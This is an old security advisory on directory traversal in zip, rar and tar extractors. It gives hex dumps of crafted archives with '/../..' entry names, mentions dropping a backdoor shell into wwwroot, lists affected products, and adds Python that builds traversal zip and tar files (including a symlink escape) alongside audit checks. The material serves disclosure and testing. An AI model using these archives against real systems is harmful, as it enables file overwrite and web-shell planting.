Directory traversal vulnerabilities in .zip .tar .rar 

Author :
The information has been provided by Hamid Ebadi
contact :  Hamid Network Security Team  : admin@hamid.ir
The original article can be found at : http://hamid.ir

Keywords:

tar, zip, rar, jar, tar.gz, gz, directory traversal, vulnerabilities, compress, extract

Summary :

What is file compression?
Compression works by eliminating or minimizing redundancy in a file, making the file smaller without losing any information. Every character on your computer, every letter, digit and punctuation mark, is stored as a sequence of bits. A simple example of compression: if a file contains the run of characters "AAAADDDDDDD", one kind of compression software can rewrite it as "4A7D", saving seven characters and making that line about 64% smaller. Compression software uses algorithms to do this.

 
What is an archive?
Think of an archive as the container that holds your compressed files. An archive can contain a single file or many files, which can be in many folders inside the archive. Each archive is a single document, just like a word processing document, graphics file or database. Many programs also let you protect your files by encrypting them with a password. When you encrypt items as they are added to an archive, only people with the correct password can expand and open them. [StuffIt]

In this paper we talk about directory traversal vulnerabilities that appear while processing (extracting) .tar, .rar and .zip files, and we create a simple tool to test for and exploit this kind of security bug.

What is the problem?
Compressed files (rar, zip, tar, gzip, ace, ...) are commonly thought of as a safe format, just as .mpeg and .wmf once were, but in 2005 and 2006 attackers showed that these "safe" file formats can be used to execute their commands. So can a compressed file be harmful? Yes. A buffer overflow or format string bug in the archiver's parser is one way, but in this paper we talk only about directory traversal, and we create simple tools to check archiver programs for it.

What is directory traversal in archivers?
The archiver trusts the path stored in each entry's header. That lets an attacker create a malicious archive whose entry names contain ".." components or absolute paths, so that extracting it overwrites system files or drops dangerous files into a chosen directory (for example shell.php in the wwwroot directory).
This can be abused by sending an archive to a local user who unzips or untars it; the archive can then overwrite any file the user has write permission to. It can also be abused against a system running antivirus software, or any other service, that automatically opens archive files.

Writing a simple scanner
We create a folder named AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (68 characters)
containing hamid.txt.
In this file we just type some simple text, like "hamid",
and compress the folder using different archive formats (rar, tar, zip).
(I use WinZip 10.0 & WinAce.)
Then we open the resulting [aaaa...a].rar in a hex editor (Hex Workshop, WinHex, ...):
=--------------------------------------------------------------------=
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.rar

00000000 5261 7221 1A07 00CF 9073 0000 0D00 0000 Rar!.....s......
00000010 0000 0000 7990 74E0 8064 0000 0000 0000 ....y.t..d......
00000020 0000 0002 0000 0000 9C43 4E34 1430 4400 .........CN4.0D.
00000030 1000 0000 4141 4141 4141 4141 4141 4141 ....AAAAAAAAAAAA
00000040 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000050 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000060 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000070 4141 4141 4141 4141 7D31 7420 806E 0005 AAAAAAAA}1t .n..
00000080 0000 0005 0000 0002 2B76 1552 EC43 4E34 ........+v.R.CN4
00000090 1D30 4E00 2000 0000 4141 4141 4141 4141 .0N. ...AAAAAAAA
000000A0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000B0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000C0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000D0 4141 4141 4141 4141 4141 4141 5C68 616D AAAAAAAAAAAA\ham
000000E0 6964 2E74 7874 6861 6D69 64C4 3D7B 0040 id.txthamid.={.@
000000F0 0700                                    ..
=--------------------------------------------------------------------=
Everything is clear in this rar file: first we created the folder [AAAA....A], then [AAAA....A]\hamid.txt, and wrote "hamid" into the file.
(The archiver decided not to compress the word "hamid" because it is too short; the METHOD byte at offset 0x91 is 0x30, "store", so the five bytes "hamid" follow the name unchanged.)
The file header that holds the name starts at offset 0x78: HEAD_CRC 7D31, HEAD_TYPE 74 (file header), HEAD_FLAGS 8020, HEAD_SIZE 006E (110 = 32 header bytes + 78 name bytes), PACK_SIZE and UNP_SIZE both 5, HOST_OS 02, FILE_CRC 2B761552 (the CRC32 of the file data; the same bytes appear in the zip entry's CRC field below), then at offset 0x92 NAME_SIZE 004E = 78, the length of "AAAA....A\hamid.txt" (68 + 10 bytes). The name itself begins at offset 0x98.
What happens if we change
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/hamid.txt
to
/../../../../../../../../../../../../../../../..///windows/system32/hamid.txt
or
/../../../../../../../../../../../../../../../../[path to wwwroot or ..]/backdoorshell.[asp|php]
?

Well, for the tester we just change it to /../../../../../../../../../../../../../../../../../../../../hacked/hamid.txt
(written into the archive with one extra "/" before "hacked", so that the new name is still exactly 78 bytes and NAME_SIZE stays correct; FILE_CRC covers only the data, not the name, so it needs no change; HEAD_CRC is left as it was, which a strict unpacker might reject, so recompute it if an archiver refuses the test file)
and save the result as hamidrartester.rar:
=--------------------------------------------------------------------=
hamidrartester.rar 

00000000 5261 7221 1A07 00CF 9073 0000 0D00 0000 Rar!.....s......
00000010 0000 0000 7990 74E0 8064 0000 0000 0000 ....y.t..d......
00000020 0000 0002 0000 0000 9C43 4E34 1430 4400 .........CN4.0D.
00000030 1000 0000 4141 4141 4141 4141 4141 4141 ....AAAAAAAAAAAA
00000040 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000050 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000060 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000070 4141 4141 4141 4141 7D31 7420 806E 0005 AAAAAAAA}1t .n..
00000080 0000 0005 0000 0002 2B76 1552 EC43 4E34 ........+v.R.CN4
00000090 1D30 4E00 2000 0000 2F2E 2E2F 2E2E 2F2E .0N. .../../../.
000000A0 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E ./../../../../..
000000B0 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F /../../../../../
000000C0 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E ../../../../../.
000000D0 2E2F 2E2E 2F2F 6861 636B 6564 2F68 616D ./..//hacked/ham
000000E0 6964 2E74 7874 6861 6D69 64C4 3D7B 0040 id.txthamid.={.@
000000F0 0700                                    ..

=--------------------------------------------------------------------=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zip

00000000 504B 0304 0A00 0000 0000 EC43 4E34 2B76 PK.........CN4+v
00000010 1552 0500 0000 0500 0000 4E00 0000 4141 .R........N...AA
00000020 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000030 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000040 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000050 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000060 4141 2F68 616D 6964 2E74 7874 6861 6D69 AA/hamid.txthami
00000070 6450 4B03 040A 0000 0000 009C 434E 3400 dPK.........CN4.
00000080 0000 0000 0000 0000 0000 0045 0000 0041 ...........E...A
00000090 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000A0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000B0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000C0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000D0 4141 412F 504B 0102 1400 0A00 0000 0000 AAA/PK..........
000000E0 EC43 4E34 2B76 1552 0500 0000 0500 0000 .CN4+v.R........
000000F0 4E00 0000 0000 0000 0100 2000 0000 0000 N......... .....
00000100 0000 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
00000110 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000120 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000130 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000140 4141 4141 4141 2F68 616D 6964 2E74 7874 AAAAAA/hamid.txt
00000150 504B 0102 1400 0A00 0000 0000 9C43 4E34 PK...........CN4
00000160 0000 0000 0000 0000 0000 0000 4500 0000 ............E...
00000170 0000 0000 0000 1000 0000 7100 0000 4141 ..........q...AA
00000180 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000190 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000001A0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000001B0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000001C0 4141 2F50 4B05 0600 0000 0002 0002 00EF AA/PK...........
000001D0 0000 00D4 0000 0000 0000                .........
=--------------------------------------------------------------------=
hamidziptester.zip

00000000 504B 0304 0A00 0000 0000 EC43 4E34 2B76 PK.........CN4+v
00000010 1552 0500 0000 0500 0000 4E00 0000 2F2E .R........N.../.
00000020 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E ./../../../../..
00000030 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F /../../../../../
00000040 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E ../../../../../.
00000050 2E2F 2E2E 2F2E 2E2F 2E2E 2F2F 6861 636B ./../../..//hack
00000060 6564 2F68 616D 6964 2E74 7874 6861 6D69 ed/hamid.txthami
00000070 6450 4B03 040A 0000 0000 009C 434E 3400 dPK.........CN4.
00000080 0000 0000 0000 0000 0000 0045 0000 0041 ...........E...A
00000090 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000A0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000B0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000C0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000000D0 4141 412F 504B 0102 1400 0A00 0000 0000 AAA/PK..........
000000E0 EC43 4E34 2B76 1552 0500 0000 0500 0000 .CN4+v.R........
000000F0 4E00 0000 0000 0000 0100 2000 0000 0000 N......... .....
00000100 0000 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E ../../../../../.
00000110 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E ./../../../../..
00000120 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F /../../../../../
00000130 2E2E 2F2E 2E2F 2E2E 2F2E 2E2F 2E2E 2F2F ../../../../..//
00000140 6861 636B 6564 2F68 616D 6964 2E74 7874 hacked/hamid.txt
00000150 504B 0102 1400 0A00 0000 0000 9C43 4E34 PK...........CN4
00000160 0000 0000 0000 0000 0000 0000 4500 0000 ............E...
00000170 0000 0000 0000 1000 0000 7100 0000 4141 ..........q...AA
00000180 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000190 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000001A0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000001B0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
000001C0 4141 2F50 4B05 0600 0000 0002 0002 00EF AA/PK...........
000001D0 0000 00D4 0000 0000 0000                .........
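As an added example (not the page's tool, and not code from WinZip or any other archiver named here), the following Python builds the same kind of test zip without a hex editor and then parses the file by hand, using the header layouts that can be followed in the two zip dumps above. It shows why the page had to edit the name in two places: the name sits in the local file header (offset 0x1E in the dump) and again in the central directory entry (offset 0x102), and extractors differ in which copy they trust. The traversal name and the "hamid" payload are assumptions chosen to mirror the page; nothing is extracted to disk.

```python
"""Build a test zip whose entry name is a raw traversal path (the same edit
the page makes with a hex editor) and walk its structures by hand.
Added example; this is not the page's tool.  The struct layouts are the
PKZIP local file header, central directory header and end-of-central-
directory record, whose fields can be followed in the dumps above."""
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"      # 50 4B 03 04, starts every local file header
CENTRAL_SIG = b"PK\x01\x02"    # 50 4B 01 02, starts every central directory entry
EOCD_SIG = b"PK\x05\x06"       # 50 4B 05 06, end of central directory record

# Assumed name for the test entry: shorter than the page's 78-byte name, but
# with enough ".." components to leave any ordinary extraction folder.
TRAVERSAL = "/../../../../../../../../hacked/hamid.txt"


def make_tester_zip(name: str, data: bytes = b"hamid") -> bytes:
    """Stored (method 0) zip with the name written verbatim.  ZipInfo is
    built directly because ZipFile.write() would strip the leading '/' and
    collapse the '..' components with os.path.normpath."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(zipfile.ZipInfo(name), data)
    return buf.getvalue()


def local_header_names(blob: bytes) -> list:
    """First copy of each name, from the local file headers.
    Layout (30 bytes): sig 4, version 2, flags 2, method 2, time 2, date 2,
    crc 4, compressed size 4, uncompressed size 4, name len 2, extra len 2."""
    names, pos = [], 0
    while blob[pos:pos + 4] == LOCAL_SIG:
        csize, nlen, elen = struct.unpack_from("<18xI4xHH", blob, pos)
        names.append(blob[pos + 30:pos + 30 + nlen].decode("utf-8"))
        pos += 30 + nlen + elen + csize        # stored data follows the header
    return names


def central_directory_names(blob: bytes) -> list:
    """Second copy of each name, from the central directory.  Extractors
    differ in which copy they trust, so a tester must change both, as the
    page's hamidziptester.zip does."""
    eocd = blob.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    # EOCD: sig 4, disk 2, cd disk 2, entries on disk 2, entries 2, cd size 4, cd offset 4
    entries, _cd_size, pos = struct.unpack_from("<10xHII", blob, eocd)
    names = []
    for _ in range(entries):
        if blob[pos:pos + 4] != CENTRAL_SIG:
            raise ValueError("central directory entry expected at %#x" % pos)
        # 46-byte header; name len, extra len and comment len sit at offset 28
        nlen, elen, clen = struct.unpack_from("<28xHHH", blob, pos)
        names.append(blob[pos + 46:pos + 46 + nlen].decode("utf-8"))
        pos += 46 + nlen + elen + clen
    return names


def is_traversal(name: str) -> bool:
    """Lexical check an extractor should apply before building the output
    path: absolute path, drive letter, or any '..' component, with either
    separator."""
    norm = name.replace("\\", "/")
    return norm.startswith("/") or (len(norm) > 1 and norm[1] == ":") or ".." in norm.split("/")


def audit_zip(blob: bytes) -> dict:
    """Compare both name copies and report anything that would escape."""
    local = local_header_names(blob)
    central = central_directory_names(blob)
    return {
        "local": local,
        "central": central,
        "consistent": local == central,
        "traversal": sorted({n for n in local + central if is_traversal(n)}),
    }


if __name__ == "__main__":
    print(audit_zip(make_tester_zip(TRAVERSAL)))
```

A tester that changes only one copy of the name will fool some extractors and not others, so the audit reports both copies and whether they agree; a defender's check should reject the entry if either copy fails is_traversal.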


I created these tools; you just need to test your archiver and see the result.
I also attach a simple tool to calculate the TAR header checksum.
You can download the tools from http://hamid.ir --> Hamid Network Security Team.

(ZIP), (RAR), (TAR), (GZ), (JAR), (TAR.GZ)
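As an added example (again not the page's tool; the page mentions a TAR checksum helper but does not show it), the following Python hand-builds ustar headers carrying a traversal name, computes the header checksum the way the ustar format defines it (the sum of all 512 header bytes with the 8-byte chksum field counted as spaces, written as six octal digits, NUL, space), and then audits the archive the way a safe extractor should. It goes a little beyond the page: besides ".." names it also flags a symlink member whose target points outside the destination, which is the other classic way past a name-only check. The member names, the "hamid" payload and the destination /srv/extract are assumptions; nothing is written to disk.

```python
"""Hand-build ustar entries with a traversal name and a correct checksum,
then audit the archive.  Added example, not the page's checksum tool.
tarfile is used only as the parser: it rejects a header whose checksum does
not match, so a hand-built entry that parses has a correct checksum."""
import io
import os
import tarfile

BLOCK = 512
# Assumed traversal name (the page's tester uses twenty "/.." components).
TRAVERSAL = "/../../../../../../../../hacked/hamid.txt"


def tar_checksum(header: bytes) -> int:
    """ustar rule: unsigned sum of all 512 bytes, chksum field read as spaces."""
    return sum(header[:148]) + 8 * 0x20 + sum(header[156:BLOCK])


def ustar_header(name: str, size: int, typeflag: bytes = b"0", linkname: str = "") -> bytes:
    """One 512-byte ustar header.  The name field is written verbatim, which
    is exactly what the page's hex edit does; the checksum is then recomputed
    so that strict parsers still accept the block."""
    name_b, link_b = name.encode(), linkname.encode()
    if len(name_b) > 100 or len(link_b) > 100:
        raise ValueError("ustar name and linkname fields are 100 bytes")
    h = bytearray(BLOCK)
    h[0:len(name_b)] = name_b              # name (offset 0, 100 bytes)
    h[100:108] = b"0000644\0"              # mode
    h[108:116] = b"0000000\0"              # uid
    h[116:124] = b"0000000\0"              # gid
    h[124:136] = b"%011o\0" % size         # size
    h[136:148] = b"%011o\0" % 0            # mtime
    h[148:156] = b" " * 8                  # chksum placeholder (spaces)
    h[156:157] = typeflag                  # '0' regular file, '2' symlink
    h[157:157 + len(link_b)] = link_b      # linkname (offset 157, 100 bytes)
    h[257:263] = b"ustar\0"                # magic
    h[263:265] = b"00"                     # version
    h[148:156] = b"%06o\0 " % tar_checksum(bytes(h))
    return bytes(h)


def build_tar(entries) -> bytes:
    """entries: (name, data) for files, (name, None, target) for symlinks.
    Data is padded to a 512-byte block; the archive ends with two zero blocks."""
    out = b""
    for e in entries:
        if len(e) == 3:
            out += ustar_header(e[0], 0, b"2", e[2])
        else:
            name, data = e
            out += ustar_header(name, len(data)) + data + b"\0" * (-len(data) % BLOCK)
    return out + b"\0" * (2 * BLOCK)


def accepted_by_tarfile(blob: bytes) -> bool:
    """Checksum oracle: a bad chksum makes tarfile raise ReadError."""
    try:
        with tarfile.open(fileobj=io.BytesIO(blob)) as tf:
            tf.getmembers()
        return True
    except tarfile.ReadError:
        return False


def escapes(dest: str, path: str) -> bool:
    """True if path, joined onto dest and normalised, leaves dest.  Absolute
    paths discard dest in os.path.join, so they are caught as well."""
    root = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(root, path))
    return os.path.commonpath([root, target]) != root


def audit_tar(blob: bytes, dest: str) -> list:
    """Members an extractor must refuse: traversal names, and symlinks whose
    target (relative to the link's own directory) leaves dest."""
    bad = []
    with tarfile.open(fileobj=io.BytesIO(blob)) as tf:
        for m in tf.getmembers():
            if escapes(dest, m.name):
                bad.append(m.name)
            elif m.issym() and escapes(dest, os.path.join(os.path.dirname(m.name), m.linkname)):
                bad.append(m.name)
    return bad


if __name__ == "__main__":
    blob = build_tar([(TRAVERSAL, b"hamid"),
                      ("AAAA/hamid.txt", b"hamid"),
                      ("AAAA/link", None, "../../../etc")])
    print(audit_tar(blob, "/srv/extract"))   # hypothetical destination
```

The audit resolves paths with realpath and commonpath rather than searching for ".." as a substring, so "AAAA/../../x" is caught after normalisation, and the right response is to refuse the member: silently stripping ".." changes what the archive contains. Recent Python (3.12 and later) applies the same kind of rules on extraction through tarfile's filter argument.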

Example:
[WinZip]
I tested it on WinZip 10.0 and got this warning as the result:
=--------------------------------------------------------------------=
Warning: One or more of the files in this archive uses ".." (parent folder) as part of its folder information.
This is very unusual in archives and can produce undesirable and potentially dangerous results, including the overwriting of important system files. You should carefully review the contents of the archive in WinZip's classic mode before extracting, especially if you are uncertain about the archive's source.
Do you want to open this archive? YES  NO
=--------------------------------------------------------------------=

If you press YES, extraction follows the ".." components and you can find hamid.txt in X:\hacked\ (the tester climbs twenty levels, enough to reach the root of the drive from any typical extraction folder).
WinZip and WinRAR have patched this bug (but I am sure many people still click YES, as I tested (-: ).
Old versions of WinZip have a directory traversal vulnerability while extracting TAR files
(I tested this successfully on WinZip 8.0: no warning or notification).


========================
 [PclZip Library]
Archive_Zip (Zip file management class)
Archive_Tar (Tar file management class)
About the PclZip author:
Author: Vincent Blavet  vincent@blavet.net
http://www.phpconcept.net
http://pear.php.net/user/vblavet
http://www.zend.com/person.php?handle=vblavet

http://www.zend.com/pear/whoiswho.php?pkg=Archive_Tar
http://pear.php.net/package/Archive_Tar

This class provides handling of tar files in PHP.
It supports creating, listing, extracting and adding to tar files.
Gzip support is available if PHP has the zlib extension built-in or
loaded. Bz2 compression is also supported with the bz2 extension loaded.


http://pear.php.net/package/Archive_Zip
http://www.zend.com/pear/whoiswho.php?pkg=Archive_Zip
This class provides handling of zip files in PHP.
It supports creating, listing, extracting and adding to zip files.

I tested this bug in Mambo.

My quick Google search for software that ships PclZip:
http://ftp.debian.org/debian/pool/main/libp/libphp-pclzip/
http://packages.debian.org/unstable/source/libphp-pclzip
mambo:http://mamboserver.com/
joomla:http://www.joomla.org
moodle:http://moodle.org
net2ftp:http://www.net2ftp.com
Portix :http://www.portix.be/
claroline:http://www.claroline.net
pivot:http://www.pivotlog.net
PhpGedView: http://phpgedview.net 
PhpZip: http://phpzip.sourceforge.net/
PHP-Fusion: http://www.php-fusion.co.uk
xoops:http://xoopscube.org/
Invision Gallery:http://invisionpower.com
atutor:http://www.atutor.ca

Directory traversal while extracting (ZIP) & (TAR)



========================
SpeedCommander 11.0
ZipStar 5.1
Squeez 5.1

Version 11.01.4450 
http://www.speedproject.de
for Windows NT/2000/XP 
Directory traversal while extracting (JAR), (ZIP)



========================
WinAce Archiver v2.6
ACE Compression Software & e-merge GmbH
www.winace.com
Directory traversal while extracting (RAR),(TAR)


========================
The StuffIt and ZipMagic family of products is designed to meet any level of compression needs, from basic expansion to advanced archive manipulation,
to automating routine compression tasks, and even building compression into a software application. Scan the list of products below to find just the right StuffIt for you! [StuffIt]
StuffIt Standard 9.0 
StuffIt Deluxe 9.0 
ZipMagic Deluxe 9.0
StuffIt Expander 

9.0.0.21 Engine 9.0.0.21
www.stuffit.com
Directory traversal while extracting (TAR),(ZIP)


========================



